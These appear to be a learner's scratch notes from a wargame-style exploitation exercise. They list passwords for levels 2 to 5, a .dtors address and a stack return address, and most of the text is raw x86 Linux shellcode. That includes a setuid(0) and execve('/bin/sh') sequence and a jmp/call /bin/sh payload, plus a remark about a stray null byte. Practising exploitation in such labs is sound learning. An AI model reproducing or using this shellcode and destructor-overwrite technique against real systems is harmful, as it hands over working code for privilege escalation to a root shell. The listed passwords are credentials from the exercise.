level2: WE5aVWRwYPhX
level3: f9esfdy8T6Hd
level4: 1ZwMe9q1nDC9
level5: RAhK8VOfcVYV



address of dtors 0x8049534
0xbfffdc20
\x20\xdc\xff\xbf


\x31\xc0\x31\xdb\xb0\x17\x50\xcd\x80\x58\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80



\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68



for some reason, there's a null byte getting inserted between strings

/bin/sh
\x2f\x62\x69\x6e\x2f\x73\x68
